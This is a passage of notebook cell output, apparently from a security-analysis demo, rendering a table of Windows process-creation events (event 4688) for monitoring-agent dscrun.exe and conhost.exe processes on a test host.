2\\cmf\\desiredstateconfiguration\\dscrun.exe0x6f82019-02-09 23:32:56.260000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 23:32:56.260</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x6f8</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01 00:00:00.000000000</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/120</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\windows\\system32\\conhost.exe0x1c242019-02-09 23:32:56.280000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 23:32:56.280</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x1c24</td>\n      <td>...</td>\n      <td>883.0</td>\n      <td>0x864</td>\n      <td>C:\\Program Files\\Microsoft Monitoring Agent\\Ag...</td>\n      <td>2019-02-09 23:32:56.260000000</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>True</td>\n      <td>False</td>\n      <td>1004/120/121</td>\n      <td>120</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x1fc02019-02-10 00:02:56.257000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-10 00:02:56.257</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x1fc0</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01 00:00:00.000000000</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/127</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\windows\\system32\\conhost.exe0x17a42019-02-10 00:02:56.270000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-10 00:02:56.270</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x17a4</td>\n      <td>...</td>\n      <td>549.0</td>\n      <td>0x864</td>\n      <td>C:\\Program Files\\Microsoft Monitoring Agent\\Ag...</td>\n      <td>2019-02-10 00:02:56.256999936</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>True</td>\n      <td>False</td>\n      <td>1004/127/128</td>\n      <td>127</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0x10bc2019-02-10 00:12:56.253000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-10 00:12:56.253</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x10bc</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01 00:00:00.000000000</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/129</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\windows\\system32\\conhost.exe0x1c102019-02-10 00:12:56.263000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-10 00:12:56.263</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x1c10</td>\n      <td>...</td>\n      <td>478.0</td>\n      <td>0x864</td>\n      <td>C:\\Program Files\\Microsoft Monitoring Agent\\Ag...</td>\n      <td>2019-02-10 00:12:56.252999936</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>True</td>\n      <td>False</td>\n      <td>1004/129/130</td>\n      <td>129</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xb482019-02-10 00:32:56.270000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-10 00:32:56.270</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0xb48</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01 00:00:00.000000000</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/139</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\windows\\system32\\conhost.exe0x235c2019-02-10 00:32:56.287000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-10 00:32:56.287</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x235c</td>\n      <td>...</td>\n      <td>553.0</td>\n      <td>0x864</td>\n      <td>C:\\Program Files\\Microsoft Monitoring Agent\\Ag...</td>\n      <td>2019-02-10 00:32:56.270000128</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>True</td>\n      <td>False</td>\n      <td>1004/139/140</td>\n      <td>139</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xbd02019-02-09 21:32:56.270000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 21:32:56.270</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0xbd0</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01 00:00:00.000000000</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/15</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\windows\\system32\\conhost.exe0x14682019-02-09 21:32:56.290000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 21:32:56.290</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x1468</td>\n      <td>...</td>\n      <td>848.0</td>\n      <td>0x864</td>\n      <td>C:\\Program Files\\Microsoft Monitoring Agent\\Ag...</td>\n      <td>2019-02-09 21:32:56.270000128</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>True</td>\n      <td>False</td>\n      <td>1004/15/16</td>\n      <td>15</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0x15c82019-02-09 20:32:56.260000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 20:32:56.260</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x15c8</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01 00:00:00.000000000</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/5</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\windows\\system32\\conhost.exe0x12782019-02-09 20:32:56.280000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 20:32:56.280</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x1278</td>\n      <td>...</td>\n      <td>850.0</td>\n      <td>0x864</td>\n      <td>C:\\Program Files\\Microsoft Monitoring Agent\\Ag...</td>\n      <td>2019-02-09 20:32:56.260000000</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>True</td>\n      <td>False</td>\n      <td>1004/5/6</td>\n      <td>5</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xe342019-02-09 22:02:56.263000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 22:02:56.263</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0xe34</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01 00:00:00.000000000</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/67</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\windows\\system32\\conhost.exe0xbc2019-02-09 22:02:56.277000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 22:02:56.277</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0xbc</td>\n      <td>...</td>\n      <td>984.0</td>\n      <td>0x864</td>\n      <td>C:\\Program Files\\Microsoft Monitoring Agent\\Ag...</td>\n      <td>2019-02-09 22:02:56.263000064</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>True</td>\n      <td>False</td>\n      <td>1004/67/68</td>\n      <td>67</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0x53c2019-02-09 22:32:56.247000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 22:32:56.247</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x53c</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01 00:00:00.000000000</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/76</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\windows\\system32\\conhost.exe0x18342019-02-09 22:32:56.260000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 22:32:56.260</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x1834</td>\n      <td>...</td>\n      <td>738.0</td>\n      <td>0x864</td>\n      <td>C:\\Program Files\\Microsoft Monitoring Agent\\Ag...</td>\n      <td>2019-02-09 22:32:56.247000064</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>True</td>\n      <td>False</td>\n      <td>1004/76/77</td>\n      <td>76</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf\\desiredstateconfiguration\\dscrun.exe0xef42019-02-09 22:32:56.260000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 22:32:56.260</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0xef4</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01 00:00:00.000000000</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/78</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\windows\\system32\\conhost.exe0x15f42019-02-09 22:32:56.273000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 22:32:56.273</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0x15f4</td>\n      <td>...</td>\n      <td>736.0</td>\n      <td>0x864</td>\n      <td>C:\\Program Files\\Microsoft Monitoring Agent\\Ag...</td>\n      <td>2019-02-09 22:32:56.260000000</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>True</td>\n      <td>False</td>\n      <td>1004/78/79</td>\n      <td>78</td>\n    </tr>\n    <tr>\n      <th>c:\\program files\\microsoft monitoring agent\\agent\\health service state\\ict 2\\cmf-64\\desiredstateconfiguration\\dscrun.exe0xcd82019-02-09 20:52:56.260000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 20:52:56.260</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0xcd8</td>\n      <td>...</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>NaN</td>\n      <td>1970-01-01 00:00:00.000000000</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>False</td>\n      <td>True</td>\n      <td>1004/8</td>\n      <td>1004</td>\n    </tr>\n    <tr>\n      <th>c:\\windows\\system32\\conhost.exe0xfd42019-02-09 20:52:56.270000</th>\n      <td>52b1ab41-869e-4138-9e40-2a4457f09bf0</td>\n      <td>WORKGROUP\\MSTICAlertsWin1$</td>\n      <td>4688</td>\n      <td>2019-02-09 20:52:56.270</td>\n      <td>MSTICAlertsWin1</td>\n      <td>S-1-5-18</td>\n      <td>MSTICAlertsWin1$</td>\n      <td>WORKGROUP</td>\n      <td>0x3e7</td>\n      <td>0xfd4</td>\n      <td>...</td>\n      <td>887.0</td>\n      <td>0x864</td>\n      <td>C:\\Program Files\\Microsoft Monitoring Agent\\Ag...</td>\n      <td>2019-02-09 20:52:56.260000000</td>\n      <td>c:\\program files\\microsoft monitoring agent\\ag...</td>\n      <td>False</td>\n      <td>True</td>\n      <td>False</td>\n      <td>1004/8/9</td>\n      <td>8</td>\n    </tr>\n  </tbody>\n</table>\n<p>25 rows × 35 columns</p>\n</div>",
+        "text/plain": "                                                                                TenantId  \\\nproc_key                                                                                   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\windows\\system32\\conhost.exe0x14682019-02-09...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\windows\\system32\\conhost.exe0x12782019-02-09...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\windows\\system32\\conhost.exe0x18342019-02-09...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\program files\\microsoft monitoring agent\\age...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ...  52b1ab41-869e-4138-9e40-2a4457f09bf0   \n\n                                                                       Account  \\\nproc_key                                                                         \nc:\\program files\\microsoft monitoring agent\\age...                         NaN   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\windows\\system32\\conhost.exe0x14682019-02-09...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\windows\\system32\\conhost.exe0x12782019-02-09...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\windows\\system32\\conhost.exe0x18342019-02-09...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\program files\\microsoft monitoring agent\\age...  WORKGROUP\\MSTICAlertsWin1$   \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ...  WORKGROUP\\MSTICAlertsWin1$   \n\n                                                    EventID  \\\nproc_key                                                      \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\windows\\system32\\conhost.exe0x14682019-02-09...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\windows\\system32\\conhost.exe0x12782019-02-09...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\windows\\system32\\conhost.exe0x18342019-02-09...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09...     4688   \nc:\\program files\\microsoft monitoring agent\\age...     4688   \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ...     4688   \n\n                                                             TimeGenerated  \\\nproc_key                                                                     \nc:\\program files\\microsoft monitoring agent\\age... 1970-01-01 00:00:00.000   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 21:02:56.257   \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09... 2019-02-09 21:02:56.273   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 23:22:56.257   \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09... 2019-02-09 23:22:56.267   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 23:32:56.260   \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09... 2019-02-09 23:32:56.280   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-10 00:02:56.257   \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10... 2019-02-10 00:02:56.270   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-10 00:12:56.253   \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10... 2019-02-10 00:12:56.263   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-10 00:32:56.270   \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10... 2019-02-10 00:32:56.287   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 21:32:56.270   \nc:\\windows\\system32\\conhost.exe0x14682019-02-09... 2019-02-09 21:32:56.290   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 20:32:56.260   \nc:\\windows\\system32\\conhost.exe0x12782019-02-09... 2019-02-09 20:32:56.280   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 22:02:56.263   \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2... 2019-02-09 22:02:56.277   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 22:32:56.247   \nc:\\windows\\system32\\conhost.exe0x18342019-02-09... 2019-02-09 22:32:56.260   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 22:32:56.260   \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09... 2019-02-09 22:32:56.273   \nc:\\program files\\microsoft monitoring agent\\age... 2019-02-09 20:52:56.260   \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ... 2019-02-09 20:52:56.270   \n\n                                                           Computer  \\\nproc_key                                                              \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\windows\\system32\\conhost.exe0x1c102019-02-10...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\windows\\system32\\conhost.exe0x235c2019-02-10...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\windows\\system32\\conhost.exe0x14682019-02-09...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\windows\\system32\\conhost.exe0x12782019-02-09...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\windows\\system32\\conhost.exe0xbc2019-02-09 2...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\windows\\system32\\conhost.exe0x18342019-02-09...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\windows\\system32\\conhost.exe0x15f42019-02-09...  MSTICAlertsWin1   \nc:\\program files\\microsoft monitoring agent\\age...  MSTICAlertsWin1   \nc:\\windows\\system32\\conhost.exe0xfd42019-02-09 ...  MSTICAlertsWin1   \n\n                                                   SubjectUserSid  \\\nproc_key                                                            \nc:\\program files\\microsoft monitoring agent\\age...            NaN   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\windows\\system32\\conhost.exe0x183c2019-02-09...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\windows\\system32\\conhost.exe0x21c82019-02-09...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\windows\\system32\\conhost.exe0x1c242019-02-09...       S-1-5-18   \nc:\\program files\\microsoft monitoring agent\\age...       S-1-5-18   \nc:\\windows\\system32\\conhost.exe0x17a42019-02-10...       S-1-5-18 